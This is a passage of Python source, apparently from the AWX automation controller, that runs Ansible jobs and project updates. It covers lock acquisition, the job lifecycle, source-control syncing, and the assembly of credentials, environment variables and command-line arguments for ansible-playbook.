if not os.path.exists(settings.PROJECTS_ROOT):
os.mkdir(settings.PROJECTS_ROOT)
lock_path = project.get_lock_file()
if lock_path is None:
# If from migration or someone blanked local_path for any other reason, recoverable by save
project.save()
lock_path = project.get_lock_file()
if lock_path is None:
raise RuntimeError(u'Invalid lock file path')
try:
self.lock_fd = os.open(lock_path, os.O_RDWR | os.O_CREAT)
except OSError as e:
logger.error("I/O error({0}) while trying to open lock file [{1}]: {2}".format(e.errno, lock_path, e.strerror))
raise
emitted_lockfile_log = False
start_time = time.time()
while True:
try:
fcntl.lockf(self.lock_fd, fcntl.LOCK_EX | fcntl.LOCK_NB)
break
except IOError as e:
if e.errno not in (errno.EAGAIN, errno.EACCES):
os.close(self.lock_fd)
logger.error("I/O error({0}) while trying to aquire lock on file [{1}]: {2}".format(e.errno, lock_path, e.strerror))
raise
else:
if not emitted_lockfile_log:
logger.info(f"exception acquiring lock {lock_path}: {e}")
emitted_lockfile_log = True
time.sleep(1.0)
self.instance.refresh_from_db(fields=['cancel_flag'])
if self.instance.cancel_flag or signal_callback():
logger.debug(f"Unified job {self.instance.id} was canceled while waiting for project file lock")
return
waiting_time = time.time() - start_time
if waiting_time > 1.0:
logger.info(f'Job {unified_job_id} waited {waiting_time} to acquire lock for local source tree for path {lock_path}.')
def pre_run_hook(self, instance, private_data_dir):
"""
Hook for any steps to run before the job/task starts
"""
instance.log_lifecycle("pre_run")
# Before task is started, ensure that job_event partitions exist
create_partition(instance.event_class._meta.db_table, start=instance.created)
def post_run_hook(self, instance, status):
"""
Hook for any steps to run before job/task is marked as complete.
"""
instance.log_lifecycle("post_run")
def final_run_hook(self, instance, status, private_data_dir):
"""
Hook for any steps to run after job/task is marked as complete.
"""
instance.log_lifecycle("finalize_run")
artifact_dir = os.path.join(private_data_dir, 'artifacts', str(self.instance.id))
collections_info = os.path.join(artifact_dir, 'collections.json')
ansible_version_file = os.path.join(artifact_dir, 'ansible_version.txt')
if os.path.exists(collections_info):
with open(collections_info) as ee_json_info:
ee_collections_info = json.loads(ee_json_info.read())
instance.installed_collections = ee_collections_info
instance.save(update_fields=['installed_collections'])
if os.path.exists(ansible_version_file):
with open(ansible_version_file) as ee_ansible_info:
ansible_version_info = ee_ansible_info.readline()
instance.ansible_version = ansible_version_info
instance.save(update_fields=['ansible_version'])
def should_use_fact_cache(self):
return False
@with_path_cleanup
@with_signal_handling
def run(self, pk, **kwargs):
"""
Run the job/task and capture its output.
"""
self.instance = self.model.objects.get(pk=pk)
if self.instance.status != 'canceled' and self.instance.cancel_flag:
self.instance = self.update_model(self.instance.pk, start_args='', status='canceled')
if self.instance.status not in ACTIVE_STATES:
# Prevent starting the job if it has been reaped or handled by another process.
raise RuntimeError(f'Not starting {self.instance.status} task pk={pk} because {self.instance.status} is not a valid active state')
if self.instance.execution_environment_id is None:
from awx.main.signals import disable_activity_stream
with disable_activity_stream():
self.instance = self.update_model(self.instance.pk, execution_environment=self.instance.resolve_execution_environment())
# self.instance because of the update_model pattern and when it's used in callback handlers
self.instance = self.update_model(pk, status='running', start_args='') # blank field to remove encrypted passwords
self.instance.websocket_emit_status("running")
status, rc = 'error', None
self.runner_callback.event_ct = 0
'''
Needs to be an object property because status_handler uses it in a callback context
'''
self.safe_cred_env = {}
private_data_dir = None
try:
self.instance.send_notification_templates("running")
private_data_dir = self.build_private_data_dir(self.instance)
self.pre_run_hook(self.instance, private_data_dir)
self.build_project_dir(self.instance, private_data_dir)
self.instance.log_lifecycle("preparing_playbook")
if self.instance.cancel_flag or signal_callback():
self.instance = self.update_model(self.instance.pk, status='canceled')
if self.instance.status != 'running':
# Stop the task chain and prevent starting the job if it has
# already been canceled.
self.instance = self.update_model(pk)
status = self.instance.status
raise RuntimeError('not starting %s task' % self.instance.status)
if not os.path.exists(settings.AWX_ISOLATION_BASE_PATH):
raise RuntimeError('AWX_ISOLATION_BASE_PATH=%s does not exist' % settings.AWX_ISOLATION_BASE_PATH)
# May have to serialize the value
private_data_files, ssh_key_data = self.build_private_data_files(self.instance, private_data_dir)
passwords = self.build_passwords(self.instance, kwargs)
self.build_extra_vars_file(self.instance, private_data_dir)
args = self.build_args(self.instance, private_data_dir, passwords)
env = self.build_env(self.instance, private_data_dir, private_data_files=private_data_files)
self.runner_callback.safe_env = build_safe_env(env)
self.runner_callback.instance = self.instance
# store a reference to the parent workflow job (if any) so we can include
# it in event data JSON
if self.instance.spawned_by_workflow:
self.runner_callback.parent_workflow_job_id = self.instance.get_workflow_job().id
self.runner_callback.job_created = str(self.instance.created)
credentials = self.build_credentials_list(self.instance)
for credential in credentials:
if credential:
credential.credential_type.inject_credential(credential, env, self.safe_cred_env, args, private_data_dir)
self.runner_callback.safe_env.update(self.safe_cred_env)
self.write_args_file(private_data_dir, args)
password_prompts = self.get_password_prompts(passwords)
expect_passwords = self.create_expect_passwords_data_struct(password_prompts, passwords)
params = {
'ident': self.instance.id,
'private_data_dir': private_data_dir,
'playbook': self.build_playbook_path_relative_to_cwd(self.instance, private_data_dir),
'inventory': self.build_inventory(self.instance, private_data_dir),
'passwords': expect_passwords,
'suppress_env_files': getattr(settings, 'AWX_RUNNER_OMIT_ENV_FILES', True),
'envvars': env,
}
if ssh_key_data is not None:
params['ssh_key'] = ssh_key_data
if isinstance(self.instance, AdHocCommand):
params['module'] = self.build_module_name(self.instance)
params['module_args'] = self.build_module_args(self.instance)
# TODO: refactor into a better BasTask method
if self.should_use_fact_cache():
# Enable Ansible fact cache.
params['fact_cache_type'] = 'jsonfile'
else:
# Disable Ansible fact cache.
params['fact_cache_type'] = ''
if self.instance.is_container_group_task or settings.IS_K8S:
params['envvars'].pop('HOME', None)
'''
Delete parameters if the values are None or empty array
'''
for v in ['passwords', 'playbook', 'inventory']:
if not params[v]:
del params[v]
runner_settings = {
'job_timeout': self.get_instance_timeout(self.instance),
'suppress_ansible_output': True,
'suppress_output_file': getattr(settings, 'AWX_RUNNER_SUPPRESS_OUTPUT_FILE', True),
}
idle_timeout = getattr(settings, 'DEFAULT_JOB_IDLE_TIMEOUT', 0)
if idle_timeout > 0:
runner_settings['idle_timeout'] = idle_timeout
# Write out our own settings file
self.write_private_data_file(private_data_dir, 'settings', json.dumps(runner_settings), sub_dir='env')
self.instance.log_lifecycle("running_playbook")
if isinstance(self.instance, SystemJob):
res = ansible_runner.interface.run(
project_dir=settings.BASE_DIR,
event_handler=self.runner_callback.event_handler,
finished_callback=self.runner_callback.finished_callback,
status_handler=self.runner_callback.status_handler,
cancel_callback=signal_callback,
**params,
)
else:
receptor_job = AWXReceptorJob(self, params)
res = receptor_job.run()
self.unit_id = receptor_job.unit_id
if not res:
return
status = res.status
rc = res.rc
if status in ('timeout', 'error'):
self.runner_callback.delay_update(skip_if_already_set=True, job_explanation=f"Job terminated due to {status}")
if status == 'timeout':
status = 'failed'
elif status == 'canceled':
self.instance = self.update_model(pk)
cancel_flag_value = getattr(self.instance, 'cancel_flag', False)
if (cancel_flag_value is False) and signal_callback():
self.runner_callback.delay_update(skip_if_already_set=True, job_explanation="Task was canceled due to receiving a shutdown signal.")
status = 'failed'
elif cancel_flag_value is False:
self.runner_callback.delay_update(skip_if_already_set=True, job_explanation="The running ansible process received a shutdown signal.")
status = 'failed'
except ReceptorNodeNotFound as exc:
self.runner_callback.delay_update(job_explanation=str(exc))
except Exception:
# this could catch programming or file system errors
self.runner_callback.delay_update(result_traceback=traceback.format_exc())
logger.exception('%s Exception occurred while running task', self.instance.log_format)
finally:
logger.debug('%s finished running, producing %s events.', self.instance.log_format, self.runner_callback.event_ct)
try:
self.post_run_hook(self.instance, status)
except PostRunError as exc:
if status == 'successful':
status = exc.status
self.runner_callback.delay_update(job_explanation=exc.args[0])
if exc.tb:
self.runner_callback.delay_update(result_traceback=exc.tb)
except Exception:
logger.exception('{} Post run hook errored.'.format(self.instance.log_format))
self.instance = self.update_model(pk)
self.instance = self.update_model(pk, status=status, select_for_update=True, **self.runner_callback.get_delayed_update_fields())
# Field host_status_counts is used as a metric to check if event processing is finished
# we send notifications if it is, if not, callback receiver will send them
if (self.instance.host_status_counts is not None) or (not self.runner_callback.wrapup_event_dispatched):
self.instance.send_notification_templates('succeeded' if status == 'successful' else 'failed')
try:
self.final_run_hook(self.instance, status, private_data_dir)
except Exception:
logger.exception('{} Final run hook errored.'.format(self.instance.log_format))
self.instance.websocket_emit_status(status)
if status != 'successful':
if status == 'canceled':
raise AwxTaskError.TaskCancel(self.instance, rc)
else:
raise AwxTaskError.TaskError(self.instance, rc)
class SourceControlMixin(BaseTask):
"""Utility methods for tasks that run use content from source control"""
def get_sync_needs(self, project, scm_branch=None):
project_path = project.get_project_path(check_if_exists=False)
job_revision = project.scm_revision
sync_needs = []
source_update_tag = 'update_{}'.format(project.scm_type)
branch_override = bool(scm_branch and scm_branch != project.scm_branch)
# TODO: skip syncs for inventory updates. Now, UI needs a link added so clients can link to project
# source_project is only a field on inventory sources.
if isinstance(self.instance, InventoryUpdate):
sync_needs.append(source_update_tag)
elif not project.scm_type:
pass # manual projects are not synced, user has responsibility for that
elif not os.path.exists(project_path):
logger.debug(f'Performing fresh clone of {project.id} for unified job {self.instance.id} on this instance.')
sync_needs.append(source_update_tag)
elif project.scm_type == 'git' and project.scm_revision and (not branch_override):
try:
git_repo = git.Repo(project_path)
if job_revision == git_repo.head.commit.hexsha:
logger.debug(f'Skipping project sync for {self.instance.id} because commit is locally available')
else:
sync_needs.append(source_update_tag)
except (ValueError, BadGitName, git.exc.InvalidGitRepositoryError):
logger.debug(f'Needed commit for {self.instance.id} not in local source tree, will sync with remote')
sync_needs.append(source_update_tag)
else:
logger.debug(f'Project not available locally, {self.instance.id} will sync with remote')
sync_needs.append(source_update_tag)
has_cache = os.path.exists(os.path.join(project.get_cache_path(), project.cache_id))
# Galaxy requirements are not supported for manual projects
if project.scm_type and ((not has_cache) or branch_override):
sync_needs.extend(['install_roles', 'install_collections'])
return sync_needs
def spawn_project_sync(self, project, sync_needs, scm_branch=None):
pu_ig = self.instance.instance_group
pu_en = Instance.objects.my_hostname()
sync_metafields = dict(
launch_type="sync",
job_type='run',
job_tags=','.join(sync_needs),
status='running',
instance_group=pu_ig,
execution_node=pu_en,
controller_node=pu_en,
celery_task_id=self.instance.celery_task_id,
)
if scm_branch and scm_branch != project.scm_branch:
sync_metafields['scm_branch'] = scm_branch
sync_metafields['scm_clean'] = True # to accomidate force pushes
if 'update_' not in sync_metafields['job_tags']:
sync_metafields['scm_revision'] = project.scm_revision
local_project_sync = project.create_project_update(_eager_fields=sync_metafields)
local_project_sync.log_lifecycle("controller_node_chosen")
local_project_sync.log_lifecycle("execution_node_chosen")
return local_project_sync
def sync_and_copy_without_lock(self, project, private_data_dir, scm_branch=None):
sync_needs = self.get_sync_needs(project, scm_branch=scm_branch)
if sync_needs:
local_project_sync = self.spawn_project_sync(project, sync_needs, scm_branch=scm_branch)
# save the associated job before calling run() so that a
# cancel() call on the job can cancel the project update
if isinstance(self.instance, Job):
self.instance = self.update_model(self.instance.pk, project_update=local_project_sync)
else:
self.instance = self.update_model(self.instance.pk, source_project_update=local_project_sync)
try:
# the job private_data_dir is passed so sync can download roles and collections there
sync_task = RunProjectUpdate(job_private_data_dir=private_data_dir)
sync_task.run(local_project_sync.id)
local_project_sync.refresh_from_db()
self.instance = self.update_model(self.instance.pk, scm_revision=local_project_sync.scm_revision)
except Exception:
local_project_sync.refresh_from_db()
if local_project_sync.status != 'canceled':
self.instance = self.update_model(
self.instance.pk,
status='failed',
job_explanation=(
'Previous Task Failed: {"job_type": "project_update", '
f'"job_name": "{local_project_sync.name}", "job_id": "{local_project_sync.id}"}}'
),
)
raise
self.instance.refresh_from_db()
if self.instance.cancel_flag:
return
else:
# Case where a local sync is not needed, meaning that local tree is
# up-to-date with project, job is running project current version
self.instance = self.update_model(self.instance.pk, scm_revision=project.scm_revision)
# Project update does not copy the folder, so copy here
RunProjectUpdate.make_local_copy(project, private_data_dir)
def sync_and_copy(self, project, private_data_dir, scm_branch=None):
self.acquire_lock(project, self.instance.id)
is_commit = False
try:
original_branch = None
failed_reason = project.get_reason_if_failed()
if failed_reason:
self.update_model(self.instance.pk, status='failed', job_explanation=failed_reason)
raise RuntimeError(failed_reason)
project_path = project.get_project_path(check_if_exists=False)
if project.scm_type == 'git' and (scm_branch and scm_branch != project.scm_branch):
if os.path.exists(project_path):
git_repo = git.Repo(project_path)
if git_repo.head.is_detached:
is_commit = True
original_branch = git_repo.head.commit
else:
original_branch = git_repo.active_branch
return self.sync_and_copy_without_lock(project, private_data_dir, scm_branch=scm_branch)
finally:
# We have made the copy so we can set the tree back to its normal state
if original_branch:
# for git project syncs, non-default branches can be problems
# restore to branch the repo was on before this run
try:
if is_commit:
git_repo.head.set_commit(original_branch)
git_repo.head.reset(index=True, working_tree=True)
else:
original_branch.checkout()
except Exception:
# this could have failed due to dirty tree, but difficult to predict all cases
logger.exception(f'Failed to restore project repo to prior state after {self.instance.id}')
self.release_lock(project)
@task(queue=get_task_queuename)
class RunJob(SourceControlMixin, BaseTask):
"""
Run a job using ansible-playbook.
"""
model = Job
event_model = JobEvent
def build_private_data(self, job, private_data_dir):
"""
Returns a dict of the form
{
'credentials': {
<awx.main.models.Credential>: <credential_decrypted_ssh_key_data>,
<awx.main.models.Credential>: <credential_decrypted_ssh_key_data>,
...
},
'certificates': {
<awx.main.models.Credential>: <signed SSH certificate data>,
<awx.main.models.Credential>: <signed SSH certificate data>,
...
}
}
"""
private_data = {'credentials': {}}
for credential in job.credentials.prefetch_related('input_sources__source_credential').all():
# If we were sent SSH credentials, decrypt them and send them
# back (they will be written to a temporary file).
if credential.has_input('ssh_key_data'):
private_data['credentials'][credential] = credential.get_input('ssh_key_data', default='')
if credential.has_input('ssh_public_key_data'):
private_data.setdefault('certificates', {})[credential] = credential.get_input('ssh_public_key_data', default='')
return private_data
def build_passwords(self, job, runtime_passwords):
"""
Build a dictionary of passwords for SSH private key, SSH user, sudo/su
and ansible-vault.
"""
passwords = super(RunJob, self).build_passwords(job, runtime_passwords)
cred = job.machine_credential
if cred:
for field in ('ssh_key_unlock', 'ssh_password', 'become_password', 'vault_password'):
value = runtime_passwords.get(field, cred.get_input('password' if field == 'ssh_password' else field, default=''))
if value not in ('', 'ASK'):
passwords[field] = value
for cred in job.vault_credentials:
field = 'vault_password'
vault_id = cred.get_input('vault_id', default=None)
if vault_id:
field = 'vault_password.{}'.format(vault_id)
if field in passwords:
raise RuntimeError('multiple vault credentials were specified with --vault-id {}@prompt'.format(vault_id))
value = runtime_passwords.get(field, cred.get_input('vault_password', default=''))
if value not in ('', 'ASK'):
passwords[field] = value
'''
Only 1 value can be provided for a unique prompt string. Prefer ssh
key unlock over network key unlock.
'''
if 'ssh_key_unlock' not in passwords:
for cred in job.network_credentials:
if cred.inputs.get('ssh_key_unlock'):
passwords['ssh_key_unlock'] = runtime_passwords.get('ssh_key_unlock', cred.get_input('ssh_key_unlock', default=''))
break
return passwords
def build_env(self, job, private_data_dir, private_data_files=None):
"""
Build environment dictionary for ansible-playbook.
"""
env = super(RunJob, self).build_env(job, private_data_dir, private_data_files=private_data_files)
if private_data_files is None:
private_data_files = {}
# Set environment variables needed for inventory and job event
# callbacks to work.
env['JOB_ID'] = str(job.pk)
env['INVENTORY_ID'] = str(job.inventory.pk)
if job.project:
env['PROJECT_REVISION'] = job.project.scm_revision
env['ANSIBLE_RETRY_FILES_ENABLED'] = "False"
env['MAX_EVENT_RES'] = str(settings.MAX_EVENT_RES_DATA)
if hasattr(settings, 'AWX_ANSIBLE_CALLBACK_PLUGINS') and settings.AWX_ANSIBLE_CALLBACK_PLUGINS:
env['ANSIBLE_CALLBACK_PLUGINS'] = ':'.join(settings.AWX_ANSIBLE_CALLBACK_PLUGINS)
env['AWX_HOST'] = settings.TOWER_URL_BASE
# Create a directory for ControlPath sockets that is unique to each job
cp_dir = os.path.join(private_data_dir, 'cp')
if not os.path.exists(cp_dir):
os.mkdir(cp_dir, 0o700)
# FIXME: more elegant way to manage this path in container
env['ANSIBLE_SSH_CONTROL_PATH_DIR'] = '/runner/cp'
# Set environment variables for cloud credentials.
cred_files = private_data_files.get('credentials', {})
for cloud_cred in job.cloud_credentials:
if cloud_cred and cloud_cred.credential_type.namespace == 'openstack' and cred_files.get(cloud_cred, ''):
env['OS_CLIENT_CONFIG_FILE'] = to_container_path(cred_files.get(cloud_cred, ''), private_data_dir)
for network_cred in job.network_credentials:
env['ANSIBLE_NET_USERNAME'] = network_cred.get_input('username', default='')
env['ANSIBLE_NET_PASSWORD'] = network_cred.get_input('password', default='')
ssh_keyfile = cred_files.get(network_cred, '')
if ssh_keyfile:
env['ANSIBLE_NET_SSH_KEYFILE'] = ssh_keyfile
authorize = network_cred.get_input('authorize', default=False)
env['ANSIBLE_NET_AUTHORIZE'] = str(int(authorize))
if authorize:
env['ANSIBLE_NET_AUTH_PASS'] = network_cred.get_input('authorize_password', default='')
path_vars = (
('ANSIBLE_COLLECTIONS_PATHS', 'collections_paths', 'requirements_collections', '~/.ansible/collections:/usr/share/ansible/collections'),
('ANSIBLE_ROLES_PATH', 'roles_path', 'requirements_roles', '~/.ansible/roles:/usr/share/ansible/roles:/etc/ansible/roles'),
('ANSIBLE_COLLECTIONS_PATH', 'collections_path', 'requirements_collections', '~/.ansible/collections:/usr/share/ansible/collections'),
)
config_values = read_ansible_config(os.path.join(private_data_dir, 'project'), list(map(lambda x: x[1], path_vars)))
for env_key, config_setting, folder, default in path_vars:
paths = default.split(':')
if env_key in env:
for path in env[env_key].split(':'):
if path not in paths:
paths = [env[env_key]] + paths
elif config_setting in config_values:
for path in config_values[config_setting].split(':'):
if path not in paths:
paths = [config_values[config_setting]] + paths
paths = [os.path.join(CONTAINER_ROOT, folder)] + paths
env[env_key] = os.pathsep.join(paths)
return env
def build_args(self, job, private_data_dir, passwords):
"""
Build command line argument list for running ansible-playbook,
optionally using ssh-agent for public/private key authentication.
"""
creds = job.machine_credential
ssh_username, become_username, become_method = '', '', ''
if creds:
ssh_username = creds.get_input('username', default='')
become_method = creds.get_input('become_method', default='')
become_username = creds.get_input('become_username', default='')
else:
become_method = None
become_username = ""
# Always specify the normal SSH user as root by default. Since this
# task is normally running in the background under a service account,
# it doesn't make sense to rely on ansible-playbook's default of using
# the current user.
ssh_username = ssh_username or 'root'
args = []
if job.job_type == 'check':
args.append('--check')
args.extend(['-u', sanitize_jinja(ssh_username)])
if 'ssh_password' in passwords:
args.append('--ask-pass')
if job.become_enabled:
args.append('--become')
if job.diff_mode:
args.append('--diff')
if become_method:
args.extend(['--become-method', sanitize_jinja(become_method)])
if become_username:
args.extend(['--become-user', sanitize_jinja(become_username)])
if 'become_password' in passwords:
args.append('--ask-become-pass')
# Support prompting for multiple vault passwords
for k, v in passwords.items():
if k.startswith('vault_password'):
if k == 'vault_password':
args.append('--ask-vault-pass')
else:
# split only on the first dot in case the vault ID itself contains a dot
vault_id = k.split('.', 1)[1]
args.append('--vault-id')
args.append('{}@prompt'.format(vault_id))
if job.forks:
if settings.MAX_FORKS > 0 and job.forks > settings.MAX_FORKS:
logger.warning(f'Maximum number of forks ({settings.MAX_FORKS}) exceeded.')
args.append('--forks=%d' % settings.MAX_FORKS)
else:
args.append('--forks=%d' % job.forks)
if job.force_handlers:
args.append('--force-handlers')
if job.limit:
args.extend(['-l', job.limit])
if job.verbosity:
args.append('-%s' % ('v' * min(5, job.verbosity)))
if job.job_tags:
args.extend(['-t', job.job_tags])
if job.skip_tags:
args.append('--skip-tags=%s' % job.skip_tags)
if job.start_at_task:
args.append('--start-at-task=%s' % job.start_at_task)
return args
def should_use_fact_cache(self):
return self.instance.use_fact_cache
def build_playbook_path_relative_to_cwd(self, job, private_data_dir):
return job.playbook
def build_extra_vars_file(self, job, private_data_dir):
extra_vars = dict()
# load in JT extra vars
if job.extra_vars_dict:
extra_vars.update(json.loads(job.decrypted_extra_vars()))
# load in meta vars, overriding any variable set in JT extra vars
extra_vars.update(job.awx_meta_vars())
# By default, all extra vars disallow Jinja2 template usage for
# security reasons; top level key-values defined in JT.extra_vars, however,
# are allowed as "safe" (because they can only be set by users with
# higher levels of privilege - those that have the ability create and
# edit Job Templates)
safe_dict = {}
if job.job_template and settings.ALLOW_JINJA_IN_EXTRA_VARS == 'template':
safe_dict = job.job_template.extra_vars_dict
return self._write_extra_vars_file(private_data_dir, extra_vars, safe_dict)
def build_credentials_list(self, job):
return job.credentials.prefetch_related('input_sources__source_credential').all()
def get_password_prompts(self, passwords={}):
d = super(RunJob, self).get_password_prompts(passwords)
d[r'Enter passphrase for .*:\s*?$'] = 'ssh_key_unlock'
d[r'Bad passphrase, try again for .*:\s*?$'] = ''
for method in PRIVILEGE_ESCALATION_METHODS:
d[r'%s password.*:\s*?$' % (method[0])] = 'become_password'
d[r'%s password.*:\s*?$' % (method[0].upper())] = 'become_password'
d[r'BECOME password.*:\s*?$'] = 'become_password'
d[r'SSH password:\s*?$'] = 'ssh_password'
d[r'Password:\s*?$'] = 'ssh_password'
d[r'Vault password:\s*?$'] = 'vault_password'
for k, v in passwords.items():
if k.startswith('vault_password.'):
# split only on the first dot in case the vault ID itself contains a dot
vault_id = k.split('.', 1)[1]
d[r'Vault password \({}\):\s*?$'.format(vault_id)] = k
return d
def pre_run_hook(self, job, private_data_dir):
super(RunJob, self).pre_run_hook(job, private_data_dir)
if job.inventory is None:
error = _('Job could not start because it does not have a valid inventory.')
self.update_model(job.pk, status='failed', job_explanation=error)
raise RuntimeError(error)
elif job.project is None:
error = _('Job could not start because it does not have a valid project.')
self.update_model(job.pk, status='failed', job_explanation=error)
raise RuntimeError(error)
elif job.execution_environment is None:
error = _('Job could not start because no Execution Environment could be found.')
self.update_model(job.pk, status='error', job_explanation=error)
raise RuntimeError(error)
if job.inventory.kind == 'smart':
# cache smart inventory memberships so that the host_filter query is not
# ran inside of the event saving code
update_smart_memberships_for_inventory(job.inventory)
# Fetch "cached" fact data from prior runs and put on the disk
# where ansible expects to find it
if self.should_use_fact_cache():
job.log_lifecycle("start_job_fact_cache")
self.facts_write_time = start_fact_cache(
job.get_hosts_for_fact_cache(), os.path.join(private_data_dir, 'artifacts', str(job.id), 'fact_cache'), inventory_id=job.inventory_id
)
def build_project_dir(self, job, private_data_dir):
self.sync_and_copy(job.project, private_data_dir, scm_branch=job.scm_branch)
def post_run_hook(self, job, status):
super(RunJob, self).post_run_hook(job, status)
job.refresh_from_db(fields=['job_env'])
private_data_dir = job.job_env.get('AWX_PRIVATE_DATA_DIR')
if (not private_data_dir) or (not hasattr(self, 'facts_write_time')):
# If there's no private data dir, that means we didn't get into the
# actual `run()` call; this _usually_ means something failed in
# the pre_run_hook method
return
if self.should_use_fact_cache() and self.runner_callback.artifacts_processed:
job.log_lifecycle("finish_job_fact_cache")
finish_fact_cache(
job.get_hosts_for_fact_cache(),
os.path.join(private_data_dir, 'artifacts', str(job.id), 'fact_cache'),
facts_write_time=self.facts_write_time,
job_id=job.id,
inventory_id=job.inventory_id,
)
def final_run_hook(self, job, status, private_data_dir):
super(RunJob, self).final_run_hook(job, status, private_data_dir)
try:
inventory = job.inventory
except Inventory.DoesNotExist:
pass
else:
if inventory is not None:
update_inventory_computed_fields.delay(inventory.id)
@task(queue=get_task_queuename)
class RunProjectUpdate(BaseTask):
model = ProjectUpdate
event_model = ProjectUpdateEvent
callback_class = RunnerCallbackForProjectUpdate
def __init__(self, *args, job_private_data_dir=None, **kwargs):
super(RunProjectUpdate, self).__init__(*args, **kwargs)
self.job_private_data_dir = job_private_data_dir
def build_private_data(self, project_update, private_data_dir):
"""
Return SSH private key data needed for this project update.
Returns a dict of the form
{
'credentials': {
<awx.main.models.Credential>: <credential_decrypted_ssh_key_data>,
<awx.main.models.Credential>: <credential_decrypted_ssh_key_data>,
<awx.main.models.Credential>: <credential_decrypted_ssh_key_data>
}
}
"""
private_data = {'credentials': {}}
if project_update.credential:
credential = project_update.credential
if credential.has_input('ssh_key_data'):
private_data['credentials'][credential] = credential.get_input('ssh_key_data', default='')
return private_data
def build_passwords(self, project_update, runtime_passwords):
"""
Build a dictionary of passwords for SSH private key unlock and SCM
username/password.
"""
passwords = super(RunProjectUpdate, self).build_passwords(project_update, runtime_passwords)
if project_update.credential:
passwords['scm_key_unlock'] = project_update.credential.get_input('ssh_key_unlock', default='')
passwords['scm_username'] = project_update.credential.get_input('username', default='')
passwords['scm_password'] = project_update.credential.get_input('password', default='')
return passwords
def build_env(self, project_update, private_data_dir, private_data_files=None):
"""
Build environment dictionary for ansible-playbook.
"""
env = super(RunProjectUpdate, self).build_env(project_update, private_data_dir, private_data_files=private_data_files)
env['ANSIBLE_RETRY_FILES_ENABLED'] = str(False)
env['ANSIBLE_ASK_PASS'] = str(False)
env['ANSIBLE_BECOME_ASK_PASS'] = str(False)
env['DISPLAY'] = '' # Prevent stupid password popup when running tests.
# give ansible a hint about the intended tmpdir to work around issues
# like https://github.com/ansible/ansible/issues/30064
env['TMP'] = settings.AWX_ISOLATION_BASE_PATH
env['PROJECT_UPDATE_ID'] = str(project_update.pk)
if settings.GALAXY_IGNORE_CERTS:
env['ANSIBLE_GALAXY_IGNORE'] = str(True)
# build out env vars for Galaxy credentials (in order)
galaxy_server_list = []
if project_update.project.organization:
for i, cred in enumerate(project_update.project.organization.galaxy_credentials.all()):
env[f'ANSIBLE_GALAXY_SERVER_SERVER{i}_URL'] = cred.get_input('url')
auth_url = cred.get_input('auth_url', default=None)
token = cred.get_input('token', default=None)
if token:
env[f'ANSIBLE_GALAXY_SERVER_SERVER{i}_TOKEN'] = token
if auth_url:
env[f'ANSIBLE_GALAXY_SERVER_SERVER{i}_AUTH_URL'] = auth_url
galaxy_server_list.append(f'server{i}')
if galaxy_server_list:
env['ANSIBLE_GALAXY_SERVER_LIST'] = ','.join(galaxy_server_list)
return env
def _build_scm_url_extra_vars(self, project_update):
"""
Helper method to build SCM url and extra vars with parameters needed
for authentication.
"""
extra_vars = {}
if project_update.credential:
scm_username = project_update.credential.get_input('username', default='')
scm_password = project_update.credential.get_input('password', default='')
else:
scm_username = ''
scm_password = ''
scm_type = project_update.scm_type
scm_url = update_scm_url(scm_type, project_update.scm_url, check_special_cases=False)
scm_url_parts = urlparse.urlsplit(scm_url)
# Prefer the username/password in the URL, if provided.
scm_username = scm_url_parts.username or scm_username
scm_password = scm_url_parts.password or scm_password
if scm_username:
if scm_type == 'svn':
extra_vars['scm_username'] = scm_username
extra_vars['scm_password'] = scm_password
scm_password = False
if scm_url_parts.scheme != 'svn+ssh':
scm_username = False
elif scm_url_parts.scheme.endswith('ssh'):
scm_password = False
elif scm_type in ('insights', 'archive'):
extra_vars['scm_username'] = scm_username
extra_vars['scm_password'] = scm_password
scm_url = update_scm_url(scm_type, scm_url, scm_username, scm_password, scp_format=True)
else:
scm_url = update_scm_url(scm_type, scm_url, scp_format=True)
# Pass the extra accept_hostkey parameter to the git module.
if scm_type == 'git' and scm_url_parts.scheme.endswith('ssh'):
extra_vars['scm_accept_hostkey'] = 'true'
return scm_url, extra_vars
def build_inventory(self, instance, private_data_dir):
return 'localhost,'
def build_args(self, project_update, private_data_dir, passwords):
"""
Build command line argument list for running ansible-playbook,
optionally using ssh-agent for public/private key authentication.
"""
args = []
if getattr(settings, 'PROJECT_UPDATE_VVV', False):
args.append('-vvv')
if project_update.job_tags:
args.extend(['-t', project_update.job_tags])
return args
def build_extra_vars_file(self, project_update, private_data_dir):
extra_vars = {}
scm_url, extra_vars_new = self._build_scm_url_extra_vars(project_update)
extra_vars.update(extra_vars_new)
scm_branch = project_update.scm_branch
if project_update.job_type == 'run' and (not project_update.branch_override):
if project_update.project.scm_revision:
scm_branch = project_update.project.scm_revision
elif not scm_branch:
raise RuntimeError('Could not determine a revision to run from project.')
elif not scm_branch:
scm_branch = 'HEAD'
galaxy_creds_are_defined = project_update.project.organization and project_update.project.organization.galaxy_credentials.exists()
if not galaxy_creds_are_defined and (settings.AWX_ROLES_ENABLED or settings.AWX_COLLECTIONS_ENABLED):
logger.warning('Galaxy role/collection syncing is enabled, but no credentials are configured for {project_update.project.organization}.')
extra_vars.update(
{
'projects_root': settings.PROJECTS_ROOT.rstrip('/'),
'local_path': os.path.basename(project_update.project.local_path),
'project_path': project_update.get_project_path(check_if_exists=False), # deprecated
'insights_url': settings.INSIGHTS_URL_BASE,
'awx_license_type': get_license().get('license_type', 'UNLICENSED'),
'awx_version': get_awx_version(),
'scm_url': scm_url,
'scm_branch': scm_branch,
'scm_clean': project_update.scm_clean,
'scm_track_submodules': project_update.scm_track_submodules,
'roles_enabled': galaxy_creds_are_defined and settings.AWX_ROLES_ENABLED,
'collections_enabled': galaxy_creds_are_defined and settings.AWX_COLLECTIONS_ENABLED,
'galaxy_task_env': settings.GALAXY_TASK_ENV,
}
)
# apply custom refspec from user for PR refs and the like
if project_update.scm_refspec:
extra_vars['scm_refspec'] = project_update.scm_refspec
elif project_update.project.allow_override:
# If branch is override-able, do extra fetch for all branches
extra_vars['scm_refspec'] = 'refs/heads/*:refs/remotes/origin/*'
if project_update.scm_type == 'archive':
# for raw archive, prevent error moving files between volumes
extra_vars['ansible_remote_tmp'] = os.path.join(project_update.get_project_path(check_if_exists=False), '.ansible_awx', 'tmp')
if project_update.project.signature_validation_credential is not None:
pubkey = project_update.project.signature_validation_credential.get_input('gpg_public_key')
extra_vars['gpg_pubkey'] = pubkey
self._write_extra_vars_file(private_data_dir, extra_vars)
def build_playbook_path_relative_to_cwd(self, project_update, private_data_dir):
return os.path.join('project_update.yml')
def get_password_prompts(self, passwords={}):
d = super(RunProjectUpdate, self).get_password_prompts(passwords)
d[r'Username for.*:\s*?$'] = 'scm_username'
